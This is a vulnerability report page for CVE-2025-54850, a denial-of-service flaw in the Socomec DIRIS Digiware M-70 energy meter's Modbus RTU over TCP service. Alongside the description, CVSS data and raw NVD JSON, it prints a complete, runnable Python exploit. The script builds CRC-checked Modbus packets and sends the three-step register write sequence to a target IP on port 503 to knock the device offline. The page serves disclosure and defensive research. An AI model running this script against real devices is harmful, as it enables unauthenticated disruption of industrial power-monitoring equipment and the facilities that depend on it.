Security Vulnerability Report
中文
CVE-2025-54850 CVSS 7.5 HIGH

CVE-2025-54850

Published: 2025-12-01 16:15:54
Last Modified: 2025-12-05 20:20:10
Source: [email protected]

Description

A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.An attacker can trigger this denial-of-service condition by sending a sequence of Modbus RTU over TCP messages to port 503 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change. After this configuration change, the device will be in a denial-of-service state.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 < 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct def create_modbus_rtu_packet(unit_id, function_code, register_addr, value): """Create a Modbus RTU packet for Write Single Register (Function Code 6)""" data = struct.pack('>B', function_code) + struct.pack('>H', register_addr) + struct.pack('>H', value) crc = calculate_modbus_crc(data) return bytes([unit_id]) + data + struct.pack('<H', crc) def calculate_modbus_crc(data): """Calculate Modbus CRC16""" crc = 0xFFFF for byte in data: crc ^= byte for _ in range(8): if crc & 0x0001: crc = (crc >> 1) ^ 0xA001 else: crc >>= 1 return crc def exploit_cve_2025_54850(target_ip, target_port=503): """ PoC for CVE-2025-54850: Socomec DIRIS Digiware M-70 DoS Attack sequence: Write to registers 58112, 29440, 57856 """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: sock.connect((target_ip, target_port)) unit_id = 0x01 # Modbus unit ID # Step 1: Write 1000 to register 58112 (0xE300) # Indicates configuration change will follow packet1 = create_modbus_rtu_packet(unit_id, 0x06, 58112, 1000) sock.send(packet1) response1 = sock.recv(1024) print(f"Step 1 sent - Register 58112 = 1000, Response: {response1.hex()}") # Step 2: Write new Modbus address to register 29440 (0x7300) # Set new Modbus address packet2 = create_modbus_rtu_packet(unit_id, 0x06, 29440, 1) sock.send(packet2) response2 = sock.recv(1024) print(f"Step 2 sent - Register 29440 = 1, Response: {response2.hex()}") # Step 3: Write 161 to register 57856 (0xE180) # Commit the configuration change - triggers DoS packet3 = create_modbus_rtu_packet(unit_id, 0x06, 57856, 161) sock.send(packet3) response3 = sock.recv(1024) print(f"Step 3 sent - Register 57856 = 161, Response: {response3.hex()}") print("Attack sequence completed. Device should now be in DoS state.") except Exception as e: print(f"Error: {e}") finally: sock.close() if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] exploit_cve_2025_54850(target) else: print("Usage: python cve-2025-54850.py <target_ip>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54850", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:54.080", "lastModified": "2025-12-05T20:20:10.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.An attacker can trigger this denial-of-service condition by sending a sequence of Modbus RTU over TCP messages to port 503 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change.\r\nAfter this configuration change, the device will be in a denial-of-service state."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.